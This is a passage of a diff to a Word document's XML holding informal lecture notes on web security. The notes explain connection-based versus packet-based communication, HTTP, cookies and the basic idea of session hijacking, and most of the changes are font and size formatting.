--- a/infosec_notes_blockwise/blocks/block_20_web_security_notes.docx
+++ b/infosec_notes_blockwise/blocks/block_20_web_security_notes.docx
@@ -2,91 +2,307 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
-    <w:p/>
-    <w:p>
-      <w:r>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Certificates not ubiquitous on the internet. Several other means attach identity to information, even though binding may be very transient(temporary).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve">Session hijacking </w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Background to this idea of continuous authentication.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>Backing up to concepts of networks ,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Backing up to concepts of </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>networks ,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
         <w:t>o</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>ne thing we should all understand is we have 2 kinds of communication when working with internet.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+        <w:t>ne</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> thing we should all understand is we have 2 kinds of communication when working with internet.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t xml:space="preserve">One is connection </w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>based, other</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t xml:space="preserve"> is packet based.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:rPr>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>When I make a phone call ,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t xml:space="preserve">When I make a phone </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>I dial a number and I  create a connection until we close the connection.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Connection based</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
+        <w:t>call ,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t>I</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dial a number and I  create a connection until we close the connection.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Connection </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>based</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Start a connection, assume all traffic between the 2 points that are created and then close the connection.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Packet based is like sending little pieces of information, one way and then the other way.</w:t>
@@ -95,102 +311,337 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>That’s like sending letters, they are data packets ,see them as packages that postman carries.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">That’s like sending letters, they are data </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>packets ,see</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> them as packages that postman carries.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Have these 2 basic methods.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>HTTP -protocol with web is a pac</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t xml:space="preserve">HTTP -protocol with web is a </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
+        <w:t>pac</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
         <w:t>ket</w:t>
       </w:r>
       <w:r>
         <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t xml:space="preserve"> based protocol.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+        <w:t xml:space="preserve"> based</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="green"/>
         </w:rPr>
-        <w:t>Feels like a connection, when I connect to bank do stuff and then drop connection.</w:t>
-      </w:r>
-      <w:r>
+        <w:t xml:space="preserve"> protocol.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Feels like a </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t>connection, when</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="green"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> I connect to bank do stuff and then drop connection.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t xml:space="preserve"> But not.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
-        <w:t>On a underlying level HTTP is me sending packets and getting something in return.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve">On </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> underlying level HTTP is me sending packets and getting something in return.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>When we make communication into sessions, we are working hard to make packages look like sessions.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>That’s when we get idea of cookies and their use for making things like sessions,</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Appear out of quickly running postman.</w:t>
       </w:r>
     </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Little illustrations here</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Me sitting at desk ,wanting to </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Me sitting at </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>desk ,wanting</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>communicate with bank.</w:t>
@@ -199,138 +650,430 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>Doing this over the web .</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t>Some kind of communication going on.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Doing this over the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>web .</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>Some</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kind of communication going on.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
           <w:highlight w:val="yellow"/>
         </w:rPr>
         <w:t>Since its via the web,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> it is packet based at a low level</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="yellow"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> , even though I can imagine it’s a connection.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> it is packet based at a low </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>level</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> even though I can imagine it’s a connection.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
         <w:t>Problem comes if connection between me and my bank is not as strong as it should be.</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:r>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>What can happen in that case is that somebody else can come along and usurp the connection and take over here and continue communicating with the bank.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t xml:space="preserve">We do have a problem with packet based </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
+        <w:t>communication</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:cstheme="minorHAnsi"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:highlight w:val="yellow"/>
+        </w:rPr>
